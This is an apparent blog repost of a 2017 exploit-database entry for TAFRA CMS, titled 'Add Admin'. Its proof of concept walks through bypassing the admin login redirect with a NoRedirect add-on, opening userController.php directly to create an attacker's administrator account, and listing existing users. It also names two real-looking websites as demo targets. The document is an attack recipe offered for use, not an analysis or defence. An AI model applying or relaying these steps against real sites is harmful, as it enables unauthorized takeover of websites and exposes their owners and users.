[TAFRA CMS "Add Admin ] ~ Technology ID

# Exploit Title: [TAFRA CMS "Add Admin ]
# Google Dork: [Use Your Brain !]
# Date: [3-5-2017]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://www.sotmasr.com/tafra.php]
# Version: [1.X.X] & [2.X.X]
# Contact: [https://ask.fm/m1g1m]
# Contact2:[https://www.facebook.com/llmgm.egll]

---------------
- | POC | -
---------------

>>>Version [1.X.X]<<<

[Add Admin]

- Open http://site.com/admin/

- Will redirect you to http://site.com/admin/controllers/login.php

- Use NoRedirect & Add ^http://site.com/admin/controllers/login.php

- Open http://site.com/admin/controllers/userController.php
>>> Then Add Your Admin <<<

- To desplay users open > http://site.com/admin/controllers/userController.php?do=show
--------------------------------------------------------------------------------------
Demo
[http://www.elkhabareg.com/]
[http://news.sotmasr.com/v1/]
-------------------------------

sumber:https://cxsecurity.com/issue/WLB-2017050028

Technology ID

We give some information

Friday, 5 May 2017

[TAFRA CMS "Add Admin ]

0 comments:

Post a Comment